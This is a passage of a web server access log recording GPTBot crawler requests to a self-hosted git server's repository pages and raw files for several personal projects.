compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" -[17/Feb/2026:13:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" -[17/Feb/2026:13:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 5252] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18148] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" -[17/Feb/2026:13:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/claude.md" -[17/Feb/2026:13:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" -[17/Feb/2026:13:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" -[17/Feb/2026:13:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" -[17/Feb/2026:13:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/README.md" -[17/Feb/2026:13:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/main.py" -[17/Feb/2026:13:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" -[17/Feb/2026:13:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71400] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" -[17/Feb/2026:13:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22879] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" -[17/Feb/2026:13:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:13:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:13:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" [Client 74.7.227.38] [Length 10719] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:13:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 10903] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 10902] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:13:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp2.md" -[17/Feb/2026:13:59:29 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:13:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" -[17/Feb/2026:13:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" [Client 74.7.227.38] [Length 10723] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:13:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" -[17/Feb/2026:13:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" -[17/Feb/2026:13:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 11646] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 11639] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:13:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:13:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11112] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:13:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71999] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66201] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:13:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:13:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" -[17/Feb/2026:13:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" [Client 74.7.227.38] [Length 12043] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:13:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:13:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:13:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:13:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:13:59:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:13:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" -[17/Feb/2026:13:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" -[17/Feb/2026:13:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 14482] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" -[17/Feb/2026:13:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" [Client 74.7.227.38] [Length 9938] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" [Client 74.7.227.38] [Length 9848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18039] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11755] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 